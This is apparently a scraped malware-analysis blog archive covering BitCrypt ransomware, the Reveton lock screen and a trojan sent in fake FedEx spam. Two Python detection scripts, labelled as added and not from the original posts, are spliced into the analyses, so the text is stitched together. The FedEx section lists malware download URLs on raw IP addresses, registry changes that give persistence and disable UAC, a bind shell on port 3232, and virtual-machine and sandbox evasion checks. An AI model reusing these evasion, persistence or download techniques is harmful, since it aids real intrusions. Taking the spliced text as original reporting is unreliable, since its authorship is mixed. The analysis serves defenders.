<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYHYpdiV4TBS1tmxeuEJvFU7GKmuTky_rP0-JkK6frYlExVvnuf5tTIBFiSPI1bLqWe9Abk5ghPhsKwou0SEfVzdCgfhXFlEAXTeDgkOvaHDQxJSFbGL4OP3uoR0MkmBidDGZNn8hpFfg/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYHYpdiV4TBS1tmxeuEJvFU7GKmuTky_rP0-JkK6frYlExVvnuf5tTIBFiSPI1bLqWe9Abk5ghPhsKwou0SEfVzdCgfhXFlEAXTeDgkOvaHDQxJSFbGL4OP3uoR0MkmBidDGZNn8hpFfg/s1600/13.png" height="320" width="315" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>Encryption routine</i></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Payload</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">After encrypting the files, it changes the infection status in bitcrypt.ccw from false to EncryptComplete.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7QYR_XXKcbq-nSKibAAVEVm11y_Wo7BqVwtGOgGaVbq87KEicjFfLYRgaoQsf88cNwzmh9vgRP-ubgWYO3odY4ufuTwxYYmT_tR40mCA9HOo3BUf0VLCNkdBRPmAgAOspZo63dz-3bSQ/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7QYR_XXKcbq-nSKibAAVEVm11y_Wo7BqVwtGOgGaVbq87KEicjFfLYRgaoQsf88cNwzmh9vgRP-ubgWYO3odY4ufuTwxYYmT_tR40mCA9HOo3BUf0VLCNkdBRPmAgAOspZo63dz-3bSQ/s1600/14.png" height="137" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It changes the wallpaper to BitCrypt.bmp to notify the user that the system has been infected by Bitcrypt v2.0.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMjNzNaTy0rC4A2XSxUfxfevoAZETrZXI7L44VO7IEvZ9VAb0BZQKhE6q1kZAFSi54CKq3eg6t12bZ-H0VHBJQ_JF8cN2MP3V8M-x_-jf3dRprZFkQqcyQfz_djimmywaReaYgtB_z1g/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMjNzNaTy0rC4A2XSxUfxfevoAZETrZXI7L44VO7IEvZ9VAb0BZQKhE6q1kZAFSi54CKq3eg6t12bZ-H0VHBJQ_JF8cN2MP3V8M-x_-jf3dRprZFkQqcyQfz_djimmywaReaYgtB_z1g/s1600/15.png" height="172" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">And to make sure the user reads Bitcrypt.txt, it opens the file in notepad.exe.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitQFUm5BHHbKMZHqW2aJ-HJC6R-ScTq6mGCDNlDsXrtsgqY5OJOXP_gXB0jl6qjRBZp1ePrVL3Kmku8zjZ4TodzndwFb4SAfST_T-b_3isDZawHaky2v0nzgdb0q6E-s7tKUnOOVq_bt8/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitQFUm5BHHbKMZHqW2aJ-HJC6R-ScTq6mGCDNlDsXrtsgqY5OJOXP_gXB0jl6qjRBZp1ePrVL3Kmku8zjZ4TodzndwFb4SAfST_T-b_3isDZawHaky2v0nzgdb0q6E-s7tKUnOOVq_bt8/s1600/16.png" height="81" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
bernadettehttp://www.blogger.com/profile/15725392824740427602noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-44885889312008141192014-06-02T19:12:00.002-07:002014-06-09T07:24:45.217-07:00Reveton: Lock Screen Achieved!
<h2 style="text-align: justify; text-justify: inter-ideograph;">
Overview</h2>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
Reveton is ransomware that locks the user's PC and claims that you have done something wrong and must pay a “Fine”. To be convincing, the lock screen displays key details such as your IP address, OS, computer name, and a timer showing how much time you have left to comply.</div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8U6xJpmEaWhoejDBDcbBQEn1GfTJmwikVnOXvs5EJoTXOe_pw-al4AaEVwHfT9G3mZRM872ew09kTjwjJdqmJE2RyX5XG4zV5X0C8uBFQbCOVeffbn_pck-wUjVSK4uTf2k_nK5eJRSE/s1600/Reveton_lockScreen.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8U6xJpmEaWhoejDBDcbBQEn1GfTJmwikVnOXvs5EJoTXOe_pw-al4AaEVwHfT9G3mZRM872ew09kTjwjJdqmJE2RyX5XG4zV5X0C8uBFQbCOVeffbn_pck-wUjVSK4uTf2k_nK5eJRSE/s1600/Reveton_lockScreen.jpg" height="355" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div align="center" class="MsoNormal">
<span style="font-size: small;">Figure 1: The Dreaded Lock Screen</span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
Once the lock screen appears, it blocks any other window from showing (explained under Achieving Lock Screen Effect): you can still launch Task Manager, but the lock screen will always be the active window.</div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<h3 style="text-align: justify; text-justify: inter-ideograph;">
Points of Interest</h3>
<div>
<div>
The sample did not copy itself to the Windows directory, nor did it modify the Windows registry to become persistent: it created no “autorun” entry, did not touch the registry values that govern window switching, and did not disable the Windows key.</div>
<div>
Although window switching and the Windows key still work, navigating away from the spawned lock screen is futile, since the sample always returns focus to it. In this one respect, at least, it is persistent.</div>
</div>
<div>
<br /></div>
<div>
<h3>
Achieving Lock Screen Effect</h3>
<div>
So how can the sample lock the screen if no registry keys were modified and no external program was dropped to do the locking? By subclassing: replacing a window's window procedure lets you intercept every message sent to that window. Window messages are the notifications Windows delivers about a window's state and events; one simple example is WM_ENABLE, which is sent when a window is enabled or disabled.</div>
<div>
To better illustrate, please refer to the figure below. We will only focus on the Lock Screen Effect so the other processes (Checking if your PaySafeCard PIN Code is valid)</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIF8qd0iMJz95sfBsEzOA1Dow117lINctqhVi_R2OwD_gLRTO6wz9wfh30qWeqsbsMM1Ine3j6dxnsl_tvK3_CR1yKL7jrvyjinEVcnPKLMz5TrVjrjiaFCJns93ahm7Tn8-dMvb_ZUMp/s1600/Reveton_lockScreen-FlowChart.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIF8qd0iMJz95sfBsEzOA1Dow117lINctqhVi_R2OwD_gLRTO6wz9wfh30qWeqsbsMM1Ine3j6dxnsl_tvK3_CR1yKL7jrvyjinEVcnPKLMz5TrVjrjiaFCJns93ahm7Tn8-dMvb_ZUMp/s1600/Reveton_lockScreen-FlowChart.jpg" height="604" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: The Lock Screen Effect Flow chart</td></tr>
</tbody></table>
<div>
<br /></div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
The chart is great, but it does not explain why the lock screen does not close when you press Alt+F4. The reason is that the picture with all the rambling about what you have done wrong is not the main window; it is just a placeholder for the image. The main window, or at least the window that has keyboard focus, is a separate window placed in front of it, a layered approach similar to layers in photo editing software such as Adobe Photoshop. If that is not enough, the sample also generates dummy windows in the background to catch stray close operations.</div>
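<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
Because nothing is dropped and no registry key changes, the behaviour above is easiest to catch dynamically: a lock screen that survives Alt+F4 and window switching has to keep forcing one window back to the foreground, and the dummy windows show up as a burst of window creations from one process. The script below is an added example and not code from the original post or from Reveton. The trace lines are constructed, their layout (t=, pid=, api=, hwnd=) is an assumed sandbox format rather than a real tool's output, and the post does not say which Win32 calls Reveton uses; SetForegroundWindow, SetWindowPos and CreateWindowEx are this example's assumption of how focus stealing and window creation normally appear in an API trace.</div>

```python
"""
Added example, not code from the original post: spot the focus-return loop
and the dummy-window burst described above in an API-call trace.

The trace is constructed for this example. Field layout (t=<seconds>
pid=<n> api=<name> hwnd=<hex>) is an assumed sandbox format, and the API
names are this example's assumption, not something the post states.
"""
import re
from collections import defaultdict, deque

FOCUS_APIS = {"SetForegroundWindow", "BringWindowToTop", "SetWindowPos", "SwitchToThisWindow"}
WINDOW_CREATE_APIS = {"CreateWindowExA", "CreateWindowExW"}
FIELD = re.compile(r"(\w+)=(\S+)")

def parse_trace(lines):
    """Parse 'k=v' trace lines into dicts with a float timestamp."""
    events = []
    for line in lines:
        ev = dict(FIELD.findall(line))
        ev["t"] = float(ev["t"])
        events.append(ev)
    return events

def _sliding_counts(events, key, apis, window, threshold):
    """For events whose api is in `apis`, group by `key` and report the largest
    number seen inside any `window`-second span, for groups reaching `threshold`."""
    recent = defaultdict(deque)
    flagged = {}
    for ev in events:
        if ev.get("api") not in apis:
            continue
        q = recent[ev[key]]
        q.append(ev["t"])
        while q and ev["t"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged[ev[key]] = max(flagged.get(ev[key], 0), len(q))
    return flagged

def focus_lock_hwnds(events, window=1.0, min_calls=5):
    """HWNDs forced to the foreground >= min_calls times within `window` seconds:
    the signature of a window that re-asserts itself whenever the user switches away."""
    return _sliding_counts(events, "hwnd", FOCUS_APIS, window, min_calls)

def dummy_window_burst(events, window=2.0, min_windows=4):
    """PIDs that create >= min_windows top-level windows within `window` seconds."""
    return _sliding_counts(events, "pid", WINDOW_CREATE_APIS, window, min_windows)

def triage(lines):
    events = parse_trace(lines)
    return {"focus_lock": focus_lock_hwnds(events), "window_burst": dummy_window_burst(events)}

# Constructed trace: pid 1234 behaves like the sample (image window, input
# window on top, dummy windows, then a steady stream of foreground calls on
# the input window); pid 0999 is an ordinary application.
SAMPLE_TRACE = [
    "t=0.000 pid=1234 api=CreateWindowExW hwnd=0x30a1c",   # lock-screen image window
    "t=0.010 pid=1234 api=CreateWindowExW hwnd=0x30a20",   # input window placed in front
    "t=0.020 pid=1234 api=CreateWindowExW hwnd=0x30a24",   # dummy windows that catch
    "t=0.030 pid=1234 api=CreateWindowExW hwnd=0x30a28",   #   stray close operations
    "t=0.040 pid=1234 api=CreateWindowExW hwnd=0x30a2c",
    "t=0.500 pid=0999 api=CreateWindowExW hwnd=0x40b10",   # unrelated process
    "t=0.600 pid=0999 api=SetForegroundWindow hwnd=0x40b10",
] + ["t=%.3f pid=1234 api=SetForegroundWindow hwnd=0x30a20" % (1.0 + 0.1 * i) for i in range(12)]

if __name__ == "__main__":
    print(triage(SAMPLE_TRACE))
```

Rate over a sliding window rather than a raw count is what separates the lock loop from a normal application that legitimately calls SetForegroundWindow once when it starts.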
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH-60GfiAOldC1Q027ukGkc3GnPFcQhwRuUgFzqXdVe4w4p_DeAOqT1ARdfYYH1S3C-f3QnD6nvKllCUK4Km9e0Dv5EFaGch8Aqaa4kJm5WdFFQEXQ9O9tUgNk6YSBRiO9ZJ0Tjn_BDPPx/s1600/Reveton_lockScreen_Layout.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH-60GfiAOldC1Q027ukGkc3GnPFcQhwRuUgFzqXdVe4w4p_DeAOqT1ARdfYYH1S3C-f3QnD6nvKllCUK4Km9e0Dv5EFaGch8Aqaa4kJm5WdFFQEXQ9O9tUgNk6YSBRiO9ZJ0Tjn_BDPPx/s1600/Reveton_lockScreen_Layout.jpg" height="294" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: The Lock Screen Layout</td></tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<h3 style="text-align: justify; text-justify: inter-ideograph;">
Conclusion</h3>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
This sample proves that, contrary to popular belief, you do not need to modify the Windows registry to keep the user focused on the lock screen. The author is aware that current AVs track dropped files and registry modifications and tried to compensate with the technique described here, which does make you wonder what the next lock screen technique will be. Perhaps we will see it soon; the timer did say I still have 1 day to give them my PaySafeCard PIN code.</div>
<div style="text-align: justify;">
<br /></div>
Wren Fer Balangcodhttp://www.blogger.com/profile/11892442983440016445noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-22608681789930073882014-05-31T01:03:00.001-07:002014-05-31T01:03:50.787-07:00Spam mail from fake FedEx<div class="MsoNormal">
Here is a screenshot of the spam mail, which claims to be from FedEx.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5P8ihIQJdfloG_VRuHaar1YPNVDQqf6LjR3vPiGtS5P_RbQNRJ0cTTiK199QmvNR7aywf2QZM14EUUcAQ7ug3czuosEnSjnpWZ2cnKa0mrZYrzq_pDn9rFxrhyoozyz6iWrA-kseKmpy5/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5P8ihIQJdfloG_VRuHaar1YPNVDQqf6LjR3vPiGtS5P_RbQNRJ0cTTiK199QmvNR7aywf2QZM14EUUcAQ7ug3czuosEnSjnpWZ2cnKa0mrZYrzq_pDn9rFxrhyoozyz6iWrA-kseKmpy5/s1600/1.png" height="393" width="640" /></a><o:p> </o:p></div>
<div class="MsoNormal" style="text-align: justify;">
You will notice that the email address in the From field is already suspicious, since it does not use the fedex.com domain.</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
The ZIP file contains an executable disguised as a PDF: it uses the double extension .PDF.EXE and the Adobe Acrobat PDF icon. We currently detect this as Trojan.Win32.Injector.awxd (v)</div>
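<div class="MsoNormal" style="text-align: justify;">
Both tells noted above, a From address outside the brand's domain and a ZIP member with an executable double extension, can be checked automatically at the mail gateway. The script below is an added example and not code from the original post. The message and the ZIP it carries are constructed inline (the sender address and attachment name are invented); fedex.com is the brand domain the post names, and the list of decoy and executable extensions is this example's own choice.</div>

```python
"""
Added example, not code from the original post: triage a message for the
two signals this spam shows, a From address that is not under the brand
domain it invokes, and a ZIP attachment whose member hides an executable
behind a document extension such as .PDF.EXE.

The message built by build_sample_message() is constructed here; the
sender address and attachment name are invented, not from the real mail.
"""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".txt"}

def sender_domain_mismatch(msg, brand, brand_domain):
    """True when the display name or subject invokes `brand` but the From
    address is not under `brand_domain` (exact match or a subdomain of it)."""
    name, addr = parseaddr(str(msg.get("From", "")))
    domain = addr.rpartition("@")[2].lower()
    mentions_brand = brand.lower() in (name + " " + str(msg.get("Subject", ""))).lower()
    under_brand = domain == brand_domain or domain.endswith("." + brand_domain)
    return mentions_brand and not under_brand

def double_extension(filename):
    """Return (decoy_ext, real_ext) for names like invoice.PDF.EXE, else None."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) == 3 and "." + parts[2] in EXEC_EXTS and "." + parts[1] in DECOY_EXTS:
        return "." + parts[1], "." + parts[2]
    return None

def suspicious_zip_members(zip_bytes):
    """List (member, (decoy_ext, real_ext)) for disguised executables in a ZIP."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            de = double_extension(name.rsplit("/", 1)[-1])
            if de:
                hits.append((name, de))
    return hits

def triage(raw_message, brand="FedEx", brand_domain="fedex.com"):
    """Return human-readable findings for one RFC 822 message (bytes)."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    if sender_domain_mismatch(msg, brand, brand_domain):
        findings.append("From address not under %s: %s" % (brand_domain, msg["From"]))
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        payload = part.get_payload(decode=True)
        if fname.lower().endswith(".zip") and payload:
            for name, (decoy, real) in suspicious_zip_members(payload):
                findings.append("%s contains %s: %s disguised as %s" % (fname, name, real, decoy))
    return findings

def build_sample_message():
    """Constructed look-alike of the spam described in the post, not the original."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("FedEx_Invoice_8823.PDF.EXE", b"MZ" + b"\x00" * 62)  # fake PE stub
    msg = EmailMessage()
    msg["From"] = "FedEx Customer Service <tracking@example.net>"   # invented sender
    msg["To"] = "victim@example.com"
    msg["Subject"] = "FedEx: Unable to deliver your parcel"
    msg.set_content("Please print the attached shipping label.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="FedEx_Invoice_8823.zip")
    return msg.as_bytes()

if __name__ == "__main__":
    for finding in triage(build_sample_message()):
        print(finding)
```

The ZIP check looks inside the archive rather than at the attachment name, since the outer file is a perfectly ordinary .zip; the domain check compares the address domain itself, not the display name, which is the part the spammer controls freely.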
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Summary</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal">
Upon execution, it creates a copy of itself as:</div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">%ALLUSERSPROFILE%\m<random string>.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
To execute itself every time Windows starts, it adds the following registry value:</div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">56140 = "%ALLUSERSPROFILE%"\m<random string>.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It sets the following registry values (EnableLUA = 0 turns off User Account Control):</div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">TaskbarNoNotification = 0</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">HideSCAHealth = 0</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">TaskbarNoNotification = 0</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">HideSCAHealth = 0</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System</span></div>
<div class="MsoNormal">
<span style="font-family: Verdana, sans-serif; font-size: 8.0pt; line-height: 115%;">EnableLUA = 0</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It also deletes the following registry key:</div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution</span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">taskmgr.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
It then spawns an instance of the non-malicious file %SYSTEM%\msiexec.exe and
injects its malicious code into that process. It then deletes itself and
downloads from the following URLs:</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://37.139.47.56/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://62.76.187.171/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://85.143.166.119/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
At the time of this writing, the servers return HTTP error 404 Not Found, so we
were not able to analyze additional downloaded components. Based on its code,
however, the server would hand out another URL pointing to either an EXE file
or a ZIP file, which the malware distinguishes by magic bytes:</div>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C44 cmp word ptr [eax], 'ZM' ; check
for 'MZ' indicates it is an EXE file<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C49 jz short loc_7FFA2C7F<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C4B cmp dword ptr [eax], 4034B50h ; check for 'PK' indicates ZIP file<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C51 jz short loc_7FFA2C70<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>A Different Payload</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal" style="text-align: justify;">
This malware employs multiple anti-analysis techniques. One
reason it does this is to make analysis difficult for us malware researchers.
In addition, it executes a different payload once it detects that it is being analyzed.
Instead of carrying out the behavior described in the Summary section, it makes
the following modifications:</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal">
Creates a copy of itself as:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">%ALLUSERSPROFILE %\explorer.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
To execute itself every time Windows starts, it adds the
following registry key:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">Start WingMan Profiler = "%ALLUSERSPROFILE %"\explorer.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Opens and listens on port 3232. If someone connects to this
port, a remote command prompt (shell) is opened.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Anti-analysis Techniques</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal">
To start, it checks the environment it is running in:</div>
<ul>
<li>Checks process names for <span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%;">VBoxService.exe</span> (VirtualBox) and <span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%;">vmtoolsd.exe</span> (VMware)</li>
<li>Queries the registry key <span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%;">HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Disk\Enum</span> and compares its value with the following strings (the dword constants 'awmv', 'xobv' and 'umeq' are the little-endian encodings of "vmwa", "vbox" and "qemu"):</li>
</ul>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E8E cmp dword ptr [ebp-364h], 'awmv'</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E98 jz short loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E9A</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E9A loc_401E9A:</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E9A cmp dword ptr [ebp-364h], 'xobv'</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA4 jz short loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA6</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA6 loc_401EA6:</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA6 cmp dword ptr [ebp-364h], 'umeq'</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EB0 jz short loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<br /></div>
<ul>
<li>Checks process names for <span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%;">'SbieDll.dll'</span> (Sandboxie)</li>
<li>Checks process names against stored hashes. The hashes cannot be reversed to the original strings, but we were able to match two of them to <span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%;">wireshark.exe</span> and <span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%;">vmtoolsd.exe</span>.</li>
</ul>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CB6 xor eax, 0E17176Fh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CBB cmp eax, 97CA535Dh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CC0 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CC6 cmp eax, 23928ADBh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CCB jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CD1 cmp eax, 6A231AA1h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CD6 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CDC cmp eax, 6DD2531Bh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CE1 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CE7 cmp eax, 3A8B8BE4h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CEC jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
